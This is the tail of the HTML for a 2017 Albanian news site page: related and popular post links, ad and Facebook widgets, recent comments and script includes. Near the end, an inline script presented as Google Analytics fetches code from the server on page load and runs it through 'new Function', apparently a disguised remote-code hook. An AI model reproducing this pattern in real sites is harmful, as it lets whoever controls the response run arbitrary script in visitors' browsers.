										<a class="post-thumb" href="http://www.shqipmedia.com/hakmerret-jordania-pas-videos-se-isis-vret-dy-xhihadiste/" title="Hakmerret Jordania, pas videos së ISIS, vret dy xhihadistë"><img src="http://www.shqipmedia.com/wp-content/uploads/2015/02/055-150x150-150x150.jpg" alt="Hakmerret Jordania, pas videos së ISIS, vret dy xhihadistë" title="Hakmerret Jordania, pas videos së ISIS, vret dy xhihadistë"/></a>
										<h4><a href="http://www.shqipmedia.com/hakmerret-jordania-pas-videos-se-isis-vret-dy-xhihadiste/" title="Hakmerret Jordania, pas videos së ISIS, vret dy xhihadistë">Hakmerret Jordania, pas videos së ISIS, vret dy xhihadistë</a></h4>
								</li>
						</ul>
			</div><!-- .related-posts -->
	
<div id="comments" class="comments-area">

	
	
	
</div><!-- /.comments-area -->    </div><!-- #content -->
</div><!-- #primary -->
<div id="sidebar" class="widget-area" role="complementary">
<aside id="text-63" class="widget widget_text">			<div class="textwidget"></div>
		</aside><aside id="text-60" class="widget widget_text">			<div class="textwidget"><a href="https://www.facebook.com/sunandstars.com.mk/?fref=ts"><img src="http://www.shqipmedia.com/wp-content/uploads/2015/02/sun-and-stars.gif" alt="sun-and-stars" width="500" height="350" class="aligncenter size-full wp-image-75408" /></a></div>
		</aside><aside id="text-45" class="widget widget_text">			<div class="textwidget"><a href="https://www.facebook.com/PalmaMall"><img src="http://www.shqipmedia.com/wp-content/uploads/2015/10/11997190_10207322821896194_363795570_n.jpg" title="source: shqipmedia.com" /></a></div>
		</aside><aside id="text-62" class="widget widget_text">			<div class="textwidget"><!--/* Revive Adserver Javascript Tag v3.0.5 */-->

<!--/*
  * The backup image section of this tag has been generated for use on a
  * non-SSL page. If this tag is to be placed on an SSL page, change the
  *   'http://aplikacii.com/reklami/www/delivery/...'
  * to
  *   'https://aplikacii.com/reklami/www/delivery/...'
  *
  * This noscript section of this tag only shows image banners. There
  * is no width or height in these banners, so if you want these tags to
  * allocate space for the ad before it shows, you will need to add this
  * information to the <img> tag.
  *
  * If you do not want to deal with the intricities of the noscript
  * section, delete the tag (from <noscript>... to </noscript>). On
  * average, the noscript tag is called from less than 1% of internet
  * users.
  */-->

<script type='text/javascript'><!--//<![CDATA[
   var m3_u = (location.protocol=='https:'?'https://aplikacii.com/reklami/www/delivery/ajs.php':'http://aplikacii.com/reklami/www/delivery/ajs.php');
   var m3_r = Math.floor(Math.random()*99999999999);
   if (!document.MAX_used) document.MAX_used = ',';
   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
   document.write ("?zoneid=2411");
   document.write ('&amp;cb=' + m3_r);
   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
   document.write ("&amp;loc=" + escape(window.location));
   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
   if (document.context) document.write ("&context=" + escape(document.context));
   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
   document.write ("'><\/scr"+"ipt>");
//]]>--></script><noscript><a href='http://aplikacii.com/reklami/www/delivery/ck.php?n=a7454954&amp;cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://aplikacii.com/reklami/www/delivery/avw.php?zoneid=2411&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;n=a7454954' border='0' alt='' /></a></noscript></div>
		</aside><aside id="text-2" class="widget widget_text"><h3 class="sb-title">Bashkohu në Facebook</h3>			<div class="textwidget"><iframe src="//www.facebook.com/plugins/likebox.php?href=https%3A%2F%2Fwww.facebook.com%2FShqipmedia&amp;width=400&amp;height=258&amp;colorscheme=light&amp;show_faces=true&amp;header=false&amp;stream=false&amp;show_border=true&amp;appId=369748999717737" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100%; height:220px;" allowTransparency="true"></iframe>

</div>
		</aside><aside id="newsplus-popular-posts-6" class="widget newsplus_popular_posts"><h3 class="sb-title">Popular Posts</h3>            <ul class="post-list">
			<li class=" 59448 post-59448 post type-post status-publish format-standard has-post-thumbnail hentry category-auto-tech"><div class="post-thumb"><a href="http://www.shqipmedia.com/zbulohet-hiper-vetura-revolucionare-e-aston-martinit-foto-dhe-video/" title="Zbulohet hiper-vetura revolucionare e Aston Martinit &#8211; FOTO dhe VIDEO"><img src="http://www.shqipmedia.com/wp-content/uploads/2016/07/0g-4-128x85.jpg" alt="Zbulohet hiper-vetura revolucionare e Aston Martinit &#8211; FOTO dhe VIDEO" title="Zbulohet hiper-vetura revolucionare e Aston Martinit &#8211; FOTO dhe VIDEO"/></a></div><div class="post-content"><h4><a href="http://www.shqipmedia.com/zbulohet-hiper-vetura-revolucionare-e-aston-martinit-foto-dhe-video/" title="Zbulohet hiper-vetura revolucionare e Aston Martinit &#8211; FOTO dhe VIDEO">Zbulohet hiper-vetura revolucionare e Aston Martinit &#8211; FOTO dhe VIDEO</a></h4><span class="entry-meta"><a href="http://www.shqipmedia.com/zbulohet-hiper-vetura-revolucionare-e-aston-martinit-foto-dhe-video/" title="13:55" class="post-time"><time class="entry-date" datetime="2016-07-06T13:55:44+00:00">07/06/2016</time></a><span class="sep comment-sep"></span><a href="http://www.shqipmedia.com/zbulohet-hiper-vetura-revolucionare-e-aston-martinit-foto-dhe-video/#comments" class="post-comment" title="Comment on Zbulohet hiper-vetura revolucionare e Aston Martinit &#8211; FOTO dhe VIDEO">3 Comments</a></span></div></li><li class=" 1240 post-1240 post type-post status-publish format-standard has-post-thumbnail hentry category-sport"><div class="post-thumb"><a href="http://www.shqipmedia.com/kosovari-ja-si-e-binda-ronaldon-te-bente-shqiponjen-foto/" title="Kosovari: Ja si e binda Ronaldon të bënte shqiponjën &#8211; FOTO"><img src="http://www.shqipmedia.com/wp-content/uploads/2014/12/RONALDO-72x96.jpg" alt="Kosovari: Ja si e binda Ronaldon të bënte shqiponjën &#8211; FOTO" title="Kosovari: Ja si e binda Ronaldon të bënte shqiponjën &#8211; FOTO"/></a></div><div class="post-content"><h4><a href="http://www.shqipmedia.com/kosovari-ja-si-e-binda-ronaldon-te-bente-shqiponjen-foto/" title="Kosovari: Ja si e binda Ronaldon të bënte shqiponjën &#8211; FOTO">Kosovari: Ja si e binda Ronaldon të bënte shqiponjën &#8211; FOTO</a></h4><span class="entry-meta"><a href="http://www.shqipmedia.com/kosovari-ja-si-e-binda-ronaldon-te-bente-shqiponjen-foto/" title="15:59" class="post-time"><time class="entry-date" datetime="2014-12-15T15:59:09+00:00">12/15/2014</time></a><span class="sep comment-sep"></span><a href="http://www.shqipmedia.com/kosovari-ja-si-e-binda-ronaldon-te-bente-shqiponjen-foto/#comments" class="post-comment" title="Comment on Kosovari: Ja si e binda Ronaldon të bënte shqiponjën &#8211; FOTO">1 Comment</a></span></div></li><li class=" 3019 post-3019 post type-post status-publish format-standard has-post-thumbnail hentry category-opinone"><div class="post-thumb"><a href="http://www.shqipmedia.com/organizimi-administrativo-politik-i-mbreterise-se-norvegjise/" title="Organizimi administrativo-politik i Mbretërisë së Norvegjisë"><img src="http://www.shqipmedia.com/wp-content/uploads/2015/01/AS-Foto-62x96.jpg" alt="Organizimi administrativo-politik i Mbretërisë së Norvegjisë" title="Organizimi administrativo-politik i Mbretërisë së Norvegjisë"/></a></div><div class="post-content"><h4><a href="http://www.shqipmedia.com/organizimi-administrativo-politik-i-mbreterise-se-norvegjise/" title="Organizimi administrativo-politik i Mbretërisë së Norvegjisë">Organizimi administrativo-politik i Mbretërisë së Norvegjisë</a></h4><span class="entry-meta"><a href="http://www.shqipmedia.com/organizimi-administrativo-politik-i-mbreterise-se-norvegjise/" title="14:23" class="post-time"><time class="entry-date" datetime="2015-01-01T14:23:38+00:00">01/01/2015</time></a><span class="sep comment-sep"></span><a href="http://www.shqipmedia.com/organizimi-administrativo-politik-i-mbreterise-se-norvegjise/#comments" class="post-comment" title="Comment on Organizimi administrativo-politik i Mbretërisë së Norvegjisë">1 Comment</a></span></div></li><li class=" 1938 post-1938 post type-post status-publish format-standard has-post-thumbnail hentry category-bulevard tag-mustafa-nano"><div class="post-thumb"><a href="http://www.shqipmedia.com/gazetaria-online-duhet-mbrojtur-prej-lexuesve-rrugace/" title="Gazetaria online duhet mbrojtur prej lexuesve rrugaçë"><img src="http://www.shqipmedia.com/wp-content/uploads/2014/12/mustafa-nano-128x81.jpg" alt="Gazetaria online duhet mbrojtur prej lexuesve rrugaçë" title="Gazetaria online duhet mbrojtur prej lexuesve rrugaçë"/></a></div><div class="post-content"><h4><a href="http://www.shqipmedia.com/gazetaria-online-duhet-mbrojtur-prej-lexuesve-rrugace/" title="Gazetaria online duhet mbrojtur prej lexuesve rrugaçë">Gazetaria online duhet mbrojtur prej lexuesve rrugaçë</a></h4><span class="entry-meta"><a href="http://www.shqipmedia.com/gazetaria-online-duhet-mbrojtur-prej-lexuesve-rrugace/" title="09:55" class="post-time"><time class="entry-date" datetime="2014-12-22T09:55:00+00:00">12/22/2014</time></a><span class="sep comment-sep"></span><a href="http://www.shqipmedia.com/gazetaria-online-duhet-mbrojtur-prej-lexuesve-rrugace/#comments" class="post-comment" title="Comment on Gazetaria online duhet mbrojtur prej lexuesve rrugaçë">1 Comment</a></span></div></li><li class=" 2128 post-2128 post type-post status-publish format-standard has-post-thumbnail hentry category-sport"><div class="post-thumb"><a href="http://www.shqipmedia.com/lorik-cana-shkruan-arabisht-allahu-ekber-foto/" title="Lorik Cana shkruan arabisht “Allahu Ekber” &#8211; FOTO"><img src="http://www.shqipmedia.com/wp-content/uploads/2014/12/auto_Cana1419277842_799034883-93x96.jpg" alt="Lorik Cana shkruan arabisht “Allahu Ekber” &#8211; FOTO" title="Lorik Cana shkruan arabisht “Allahu Ekber” &#8211; FOTO"/></a></div><div class="post-content"><h4><a href="http://www.shqipmedia.com/lorik-cana-shkruan-arabisht-allahu-ekber-foto/" title="Lorik Cana shkruan arabisht “Allahu Ekber” &#8211; FOTO">Lorik Cana shkruan arabisht “Allahu Ekber” &#8211; FOTO</a></h4><span class="entry-meta"><a href="http://www.shqipmedia.com/lorik-cana-shkruan-arabisht-allahu-ekber-foto/" title="11:39" class="post-time"><time class="entry-date" datetime="2014-12-23T11:39:49+00:00">12/23/2014</time></a><span class="sep comment-sep"></span><a href="http://www.shqipmedia.com/lorik-cana-shkruan-arabisht-allahu-ekber-foto/#comments" class="post-comment" title="Comment on Lorik Cana shkruan arabisht “Allahu Ekber” &#8211; FOTO">1 Comment</a></span></div></li></ul></aside>		</div><!-- #sidebar -->		</div><!-- .row -->
    </div><!-- #main .wrap -->
</div><!-- #main -->
        <div id="secondary" role="complementary">
            <div class="wrap clear">
                <div class="column one-fourth">
							<aside id="recent-posts-5" class="widget widget_recent_entries">		<h3 class="sc-title">Të fundit</h3>		<ul>
					<li>
				<a href="http://www.shqipmedia.com/femrat-seksi-dhurojne-skena-te-nxehta-ne-plazh-topless-e-duke-u-puthur-18/">Femrat seksi dhurojnë skena të nxehta në plazh, topless e duke u puthur (+18)</a>
							<span class="post-date">03/10/2017</span>
						</li>
					<li>
				<a href="http://www.shqipmedia.com/as-uniformat-e-policise-e-as-banknota-ne-dy-gjuhe/">As uniformat e policisë e as banknota në dy gjuhë</a>
							<span class="post-date">03/10/2017</span>
						</li>
					<li>
				<a href="http://www.shqipmedia.com/keto-jane-te-gjitha-pikat-e-programit-te-ri-qeveritar-te-zoran-zaevit/">Këto janë të gjitha pikat e programit të ri qeveritar të Zoran Zaevit</a>
							<span class="post-date">03/10/2017</span>
						</li>
					<li>
				<a href="http://www.shqipmedia.com/lequipe-ka-masakruar-skuadren-e-psg-ne-shkrimin-e-fundit/">L’Equipe ka “masakruar” skuadrën e PSG në shkrimin e fundit</a>
							<span class="post-date">03/10/2017</span>
						</li>
					<li>
				<a href="http://www.shqipmedia.com/karriera-e-messit-ka-marre-fund-deklarata-qe-po-habit-boten/">‘Karriera e Messit ka marrë fund…’ -Deklarata që po habit botën</a>
							<span class="post-date">03/10/2017</span>
						</li>
				</ul>
		</aside>		                </div><!-- .column one-fourth -->
                <div class="column one-fourth">
					                </div><!-- .column one-fourth -->
                <div class="column one-fourth">
					<aside id="recent-comments-2" class="widget widget_recent_comments"><h3 class="sc-title">Recent Comments</h3><ul id="recentcomments"><li class="recentcomments"><span class="comment-author-link">Sali Ramadani</span> on <a href="http://www.shqipmedia.com/top-lajm-biseda-e-beg-rizajt-e-mirsad-ndrecajt-me-spiunin-maqedonas-audio/#comment-6349">TOP LAJM: Biseda e Beg Rizajt e Mirsad Ndrecajt me spiunin maqedonas &#8211; AUDIO</a></li><li class="recentcomments"><span class="comment-author-link">verwest85 .</span> on <a href="http://www.shqipmedia.com/isis-me-plis/#comment-6348">ISIS me plis</a></li><li class="recentcomments"><span class="comment-author-link">Poker</span> on <a href="http://www.shqipmedia.com/lajm-a-e-din-zemri-qamili-se-a-jane-ekzekutuar-beg-rizaj-dhe-mirsad-ndrecaj/#comment-6347">Lajm: A e din Zemri Qamili se a janë ekzekutuar Beg Rizaj dhe Mirsad Ndrecaj?</a></li><li class="recentcomments"><span class="comment-author-link">Sula Sulejmani</span> on <a href="http://www.shqipmedia.com/ky-eshte-shenasi-memeti-agjenti-i-maqedonise-foto/#comment-6346">Ky është Shenasi Memeti, agjenti i Maqedonisë &#8211; FOTO</a></li><li class="recentcomments"><span class="comment-author-link">bujo_boss@msn.com</span> on <a href="http://www.shqipmedia.com/mirsad-ndrecaj-nato-percillet-per-ne-banesen-e-fundit-foto/#comment-6345">Mirsad Ndrecaj &#8211; NATO përcillet për në banesën e fundit &#8211; FOTO</a></li></ul></aside>                </div><!-- .column one-fourth -->
                <div class="column one-fourth last">
					<aside id="newsplus-flickr-5" class="widget newsplus_flickr"><h3 class="sc-title">Fotografi te ndryshme</h3>        <div id="flickr_badge_wrapper">
                    <script type="text/javascript" src="http://www.flickr.com/badge_code_v2.gne?count=10&amp;display=random&amp;size=s&amp;layout=x&amp;source=all_tag&amp;tag=albania"></script>
        </div><!-- END FLICKR BADGE WRAPPER -->

	</aside>                </div><!-- .column one-fourth .last -->
            </div><!-- #secondary .wrap -->
        </div><!-- #secondary -->
	<footer id="footer" role="contentinfo">
    <div class="wrap clear">
        <div class="notes-left">© 2008-2017 shqipmedia.com - Të gjitha të drejtat e rezervuara.</div><!-- .notes-left -->
        <div class="notes-right"> </div><!-- .notes-right -->
    </div><!-- #footer wrap -->
</footer><!-- #footer -->

<div class="fixed-widget-bar fixed-left">
	</div>

<div class="fixed-widget-bar fixed-right">
	</div>

</div> <!-- #page -->
<div class="scroll-to-top"><a href="#" title="Scroll to top"><span class="sr-only">Top</span></a></div><!-- .scroll-to-top -->
        <div id="fb-root"></div>
        <script>(function(d, s, id) {
          var js, fjs = d.getElementsByTagName(s)[0];
          if (d.getElementById(id)) return;
          js = d.createElement(s); js.id = id;
          js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&appId=102104852359&version=v2.3";
          fjs.parentNode.insertBefore(js, fjs);
        }(document, 'script', 'facebook-jssdk'));</script>	
    	<div style="display:none">
	</div>
<script>
    jQuery(document).ready(function () {
		jQuery.post('http://www.shqipmedia.com?ga_action=googleanalytics_get_script', {action: 'googleanalytics_get_script'}, function(response) {
			var F = new Function ( response );
			return( F() );
		});
    });
</script>	<script>
			// List of Themes, Classes and Regular expressions
		var template_name = 'newsplus-new';
		switch(template_name) {
			case 'twentyeleven' :
					var classes = ['entry-meta'];
					var regex = ' by <a(.*?)\/a>;<span class="sep"> by <\/span>';
					break;
			case 'twentyten' :
					var classes = ['entry-meta'];
					var regex = ' by <a(.*?)\/a>;<span class="meta-sep">by<\/span>';
					break;
			case 'object' :
					var classes = ['post-details', 'post'];
					var regex = ' by <span(.*?)\/span>;<p class="post-details">by';
					break;
			case 'theme-revenge' :
					var classes = ['post-entry-meta'];
					var regex = 'By <a(.*?)\/a> on';
					break;
			case 'Magnificent' :
					var classes = ['meta-info'];
					var regex = '<span>by<\/span> <a(.*?)\/a>;Posted by <a(.*?)\/a> on ';
					break;
			case 'wp-clearphoto' :
					var classes = ['meta'];
					var regex = '\\|\\s*<\/span>\\s*<span class="meta-author">\\s*<a(.*?)\/a>';
					break;
			case 'wp-clearphoto1' :
					var classes = ['meta'];
					var regex = '\\|\\s*<\/span>\\s*<span class="meta-author">\\s*<a(.*?)\/a>';
					break;
			default:
					var classes = ['entry-meta'];
					var regex = ' by <a(.*?)\/a>;<span class="sep"> by <\/span>; <span class="meta-sep">by<\/span>;<span class="meta-sep"> by <\/span>';
		}
				if (typeof classes[0] !== 'undefined' && classes[0] !== null) {
				for(var i = 0; i < classes.length; i++) {
					var elements = document.querySelectorAll('.'+classes[i]);
					for (var j = 0; j < elements.length; j++) {
						var regex_array = regex.split(";");
						for(var k = 0; k < regex_array.length; k++) {
							 if (elements[j].innerHTML.match(new RegExp(regex_array[k], "i"))) {
								 var replaced_txt = elements[j].innerHTML.replace(new RegExp(regex_array[k], "i"), '');
								 elements[j].innerHTML = replaced_txt;
							 }
						}
					}			
				}
			}
						
		</script>
	<link rel='stylesheet' id='dashicons-css'  href='http://www.shqipmedia.com/wp-includes/css/dashicons.min.css?ver=4.7.3' type='text/css' media='all' />
<link rel='stylesheet' id='thickbox-css'  href='http://www.shqipmedia.com/wp-includes/js/thickbox/thickbox.css?ver=4.7.3' type='text/css' media='all' />
<script type='text/javascript' src='http://www.shqipmedia.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-content/plugins/newsplus-shortcodes/assets/js/custom.js?ver=4.7.3'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-content/plugins/newsplus-shortcodes/assets/js/jquery.easing.min.js?ver=4.7.3'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-content/plugins/newsplus-shortcodes/assets/js/froogaloop2.min.js?ver=4.7.3'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-content/plugins/newsplus-shortcodes/assets/js/jquery.flexslider-min.js?ver=4.7.3'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-content/plugins/newsplus-shortcodes/assets/js/jquery.marquee.min.js?ver=4.7.3'></script>
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201710'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-content/plugins/sharify/admin/inc/sharifycounts.js?ver=1.4'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-content/themes/newsplus-new/js/jquery.hoverIntent.minified.js?ver=4.7.3'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-content/themes/newsplus-new/js/jquery.prettyPhoto.js?ver=4.7.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var ss_custom = {"top_bar_sticky":"","main_bar_sticky":"true","expand_menu_text":"Expand or collapse menu items.","enable_responsive_menu":"true"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-content/themes/newsplus-new/js/custom.js?ver=4.7.3'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-includes/js/wp-embed.min.js?ver=4.7.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var thickboxL10n = {"next":"Next >","prev":"< Prev","image":"Image","of":"of","close":"Close","noiframes":"This feature requires inline frames. You have iframes disabled or your browser does not support them.","loadingAnimation":"http:\/\/www.shqipmedia.com\/wp-includes\/js\/thickbox\/loadingAnimation.gif"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105'></script>
<script type='text/javascript' src='https://stats.wp.com/e-201710.js' async defer></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:4.7',blog:'13541830',post:'88771',tz:'2',srv:'www.shqipmedia.com'} ]);
	_stq.push([ 'clickTrackerInit', '13541830', '88771' ]);
</script>
</body>
</html>
<!-- Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/

 Served from: www.shqipmedia.com @ 2017-03-10 17:29:10 by W3 Total Cache -->